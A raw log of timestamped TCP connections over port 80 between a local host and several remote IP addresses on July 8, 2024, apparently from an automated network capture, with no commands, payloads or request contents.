                                              Jul 8, 2024 09:34:36.611450911 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611460924 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611493111 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611576080 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611588001 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611613035 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611622095 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.611670971 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:37.083919048 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:37.089000940 CEST4975780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:38.108414888 CEST4975780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:38.283401966 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:39.128623962 CEST4975880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:39.134346008 CEST80497583.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:39.138565063 CEST4975880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:39.138565063 CEST4975880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:39.144134045 CEST80497583.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:39.617795944 CEST80497583.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:39.617934942 CEST80497583.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:39.617985964 CEST4975880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:39.620640993 CEST4975880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:39.625740051 CEST80497583.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:44.790539980 CEST4975980192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:44.796107054 CEST8049759203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:44.798685074 CEST4975980192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:44.802546024 CEST4975980192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:44.807303905 CEST8049759203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:45.390484095 CEST8049759203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:45.391064882 CEST8049759203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:45.391114950 CEST4975980192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:46.311570883 CEST4975980192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:47.330559969 CEST4976080192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:47.335475922 CEST8049760203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:47.335557938 CEST4976080192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:47.337887049 CEST4976080192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:47.342689991 CEST8049760203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:47.935069084 CEST8049760203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:47.935445070 CEST8049760203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:47.935522079 CEST4976080192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:48.842830896 CEST4976080192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:49.864286900 CEST4976180192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:49.869457006 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.869532108 CEST4976180192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:49.873259068 CEST4976180192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:49.878249884 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878577948 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878587961 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878596067 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878659010 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878668070 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878681898 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878748894 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:49.878760099 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:50.486083031 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:50.486181021 CEST8049761203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:50.486272097 CEST4976180192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:51.389765978 CEST4976180192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:52.408570051 CEST4976280192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:52.413700104 CEST8049762203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:34:52.418741941 CEST4976280192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:52.421475887 CEST4976280192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:34:52.426703930 CEST8049762203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:35:08.276060104 CEST8049762203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:35:08.276546955 CEST8049762203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:35:08.276592970 CEST4976280192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:35:08.279027939 CEST4976280192.168.2.4203.161.41.207
                                              Jul 8, 2024 09:35:08.283865929 CEST8049762203.161.41.207192.168.2.4
                                              Jul 8, 2024 09:35:13.556890965 CEST4976380192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:13.561924934 CEST8049763216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:13.561992884 CEST4976380192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:13.564702034 CEST4976380192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:13.569595098 CEST8049763216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:14.146084070 CEST8049763216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:14.146142960 CEST8049763216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:14.146194935 CEST4976380192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:15.078548908 CEST4976380192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:16.096457958 CEST4976480192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:16.101368904 CEST8049764216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:16.101439953 CEST4976480192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:16.103528976 CEST4976480192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:16.108381033 CEST8049764216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:16.693977118 CEST8049764216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:16.693996906 CEST8049764216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:16.698544979 CEST4976480192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:17.608448029 CEST4976480192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:18.628351927 CEST4976580192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:18.634262085 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.634382963 CEST4976580192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:18.636713982 CEST4976580192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:18.642287016 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642417908 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642427921 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642569065 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642577887 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642585993 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642708063 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642718077 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:18.642726898 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:19.234251022 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:19.234263897 CEST8049765216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:19.234584093 CEST4976580192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:20.139874935 CEST4976580192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.163590908 CEST4976680192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.168719053 CEST8049766216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:21.169634104 CEST4976680192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.171313047 CEST4976680192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.176404953 CEST8049766216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:21.744081020 CEST8049766216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:21.744155884 CEST8049766216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:21.744262934 CEST4976680192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.747617960 CEST4976680192.168.2.4216.194.173.237
                                              Jul 8, 2024 09:35:21.752474070 CEST8049766216.194.173.237192.168.2.4
                                              Jul 8, 2024 09:35:26.800556898 CEST4976780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:26.805319071 CEST80497673.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:26.808693886 CEST4976780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:26.812578917 CEST4976780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:26.817353964 CEST80497673.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:27.306639910 CEST80497673.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:27.313139915 CEST4976780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:28.311671972 CEST4976780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:28.316596031 CEST80497673.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:29.332592964 CEST4976880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:29.337568998 CEST80497683.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:29.337666035 CEST4976880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:29.340648890 CEST4976880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:29.345655918 CEST80497683.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:29.809988022 CEST80497683.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:29.810039997 CEST4976880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:30.842951059 CEST4976880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:30.852471113 CEST80497683.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.862853050 CEST4976980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:31.867925882 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.868056059 CEST4976980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:31.870661974 CEST4976980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:31.875968933 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.875979900 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.875988960 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876000881 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876060963 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876070023 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876272917 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876282930 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:31.876667023 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:32.361196041 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:32.361268997 CEST4976980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:33.374089003 CEST4976980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:33.379465103 CEST80497693.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:34.392178059 CEST4977080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:34.397239923 CEST80497703.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:34.397330999 CEST4977080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:34.398853064 CEST4977080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:34.403692007 CEST80497703.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:34.889822960 CEST80497703.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:34.890523911 CEST80497703.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:34.892817974 CEST4977080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:34.896765947 CEST4977080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:35:34.901729107 CEST80497703.33.130.190192.168.2.4
                                              Jul 8, 2024 09:35:40.862763882 CEST4977180192.168.2.438.47.226.116
                                              Jul 8, 2024 09:35:40.867619038 CEST804977138.47.226.116192.168.2.4
                                              Jul 8, 2024 09:35:40.867764950 CEST4977180192.168.2.438.47.226.116
Jul 8, 2024 09:35:40.869652033 CEST | 49771 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:40.874792099 CEST | 80 | 49771 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:41.787241936 CEST | 80 | 49771 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:41.787699938 CEST | 80 | 49771 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:41.787755013 CEST | 49771 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:42.374116898 CEST | 49771 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:43.392916918 CEST | 49772 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:43.398010969 CEST | 80 | 49772 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:43.398641109 CEST | 49772 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:43.402555943 CEST | 49772 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:43.407373905 CEST | 80 | 49772 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:44.298962116 CEST | 80 | 49772 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:44.298986912 CEST | 80 | 49772 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:44.299060106 CEST | 49772 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:44.906560898 CEST | 49772 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:45.924554110 CEST | 49773 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:45.929399967 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.929470062 CEST | 49773 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:45.931587934 CEST | 49773 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:45.936538935 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936604023 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936614037 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936661959 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936760902 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936770916 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936780930 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.936789989 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:45.937077999 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:46.904247999 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:46.939979076 CEST | 80 | 49773 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:46.944648027 CEST | 49773 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:47.438560963 CEST | 49773 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:48.455570936 CEST | 49774 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:48.460462093 CEST | 80 | 49774 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:48.464453936 CEST | 49774 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:48.464453936 CEST | 49774 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:48.469225883 CEST | 80 | 49774 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:49.389127970 CEST | 80 | 49774 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:49.389208078 CEST | 80 | 49774 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:49.390732050 CEST | 49774 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:49.394536972 CEST | 49774 | 80 | 192.168.2.4 | 38.47.226.116
Jul 8, 2024 09:35:49.399276018 CEST | 80 | 49774 | 38.47.226.116 | 192.168.2.4
Jul 8, 2024 09:35:55.544914961 CEST | 49775 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:55.552129030 CEST | 80 | 49775 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:35:55.552192926 CEST | 49775 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:55.554614067 CEST | 49775 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:55.562866926 CEST | 80 | 49775 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:35:57.062556982 CEST | 49775 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:57.110630035 CEST | 80 | 49775 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:35:58.081587076 CEST | 49776 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:58.086692095 CEST | 80 | 49776 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:35:58.086754084 CEST | 49776 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:58.089072943 CEST | 49776 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:58.094465017 CEST | 80 | 49776 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:35:59.593430042 CEST | 49776 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:35:59.698990107 CEST | 80 | 49776 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.614662886 CEST | 49777 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:00.619699001 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.624855042 CEST | 49777 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:00.624855042 CEST | 49777 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:00.630002975 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.630300999 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.630311966 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.630979061 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.630987883 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.630995989 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.631556034 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.631566048 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:00.631573915 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:02.139712095 CEST | 49777 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:02.190592051 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:03.157763958 CEST | 49778 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:03.163043022 CEST | 80 | 49778 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:03.164733887 CEST | 49778 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:03.168662071 CEST | 49778 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:03.175892115 CEST | 80 | 49778 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:16.969985008 CEST | 80 | 49775 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:16.970123053 CEST | 49775 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:19.516988993 CEST | 80 | 49776 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:19.517045975 CEST | 49776 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:21.997194052 CEST | 80 | 49777 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:21.997256994 CEST | 49777 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:24.513144016 CEST | 80 | 49778 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:24.513257027 CEST | 49778 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:24.514156103 CEST | 49778 | 80 | 192.168.2.4 | 132.226.11.158
Jul 8, 2024 09:36:24.519022942 CEST | 80 | 49778 | 132.226.11.158 | 192.168.2.4
Jul 8, 2024 09:36:29.542990923 CEST | 49779 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:29.547703981 CEST | 80 | 49779 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:29.547764063 CEST | 49779 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:29.550105095 CEST | 49779 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:29.554877043 CEST | 80 | 49779 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:30.223695040 CEST | 80 | 49779 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:30.223740101 CEST | 80 | 49779 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:30.223784924 CEST | 49779 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:31.066550016 CEST | 49779 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:32.081568003 CEST | 49780 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:32.086514950 CEST | 80 | 49780 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:32.086595058 CEST | 49780 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:32.088742018 CEST | 49780 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:32.094152927 CEST | 80 | 49780 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:32.728183985 CEST | 80 | 49780 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:32.729847908 CEST | 80 | 49780 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:32.733576059 CEST | 49780 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:33.592843056 CEST | 49780 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:34.612807989 CEST | 49781 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:34.617804050 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.622689009 CEST | 49781 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:34.626574993 CEST | 49781 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:34.631443024 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.631473064 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.631483078 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.631490946 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.631514072 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.631800890 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.632019997 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.632028103 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:34.632036924 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:35.282764912 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:35.283155918 CEST | 80 | 49781 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:35.284687042 CEST | 49781 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:36.139714956 CEST | 49781 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.158552885 CEST | 49782 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.163558960 CEST | 80 | 49782 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:37.166667938 CEST | 49782 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.170553923 CEST | 49782 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.175525904 CEST | 80 | 49782 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:37.825562954 CEST | 80 | 49782 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:37.826349974 CEST | 80 | 49782 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:37.826397896 CEST | 49782 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.829051018 CEST | 49782 | 80 | 192.168.2.4 | 217.160.0.119
Jul 8, 2024 09:36:37.833870888 CEST | 80 | 49782 | 217.160.0.119 | 192.168.2.4
Jul 8, 2024 09:36:51.134550095 CEST | 49783 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:51.139349937 CEST | 80 | 49783 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:51.142613888 CEST | 49783 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:51.146475077 CEST | 49783 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:51.151237011 CEST | 80 | 49783 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:51.617281914 CEST | 80 | 49783 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:51.617593050 CEST | 80 | 49783 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:51.617661953 CEST | 49783 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:52.658559084 CEST | 49783 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:53.675986052 CEST | 49784 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:53.681000948 CEST | 80 | 49784 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:53.681077003 CEST | 49784 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:53.684487104 CEST | 49784 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:53.689518929 CEST | 80 | 49784 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:54.177138090 CEST | 80 | 49784 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:54.177162886 CEST | 80 | 49784 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:54.177225113 CEST | 49784 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:55.186609030 CEST | 49784 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:56.206787109 CEST | 49785 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:56.211759090 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.211831093 CEST | 49785 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:56.214624882 CEST | 49785 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:56.219621897 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
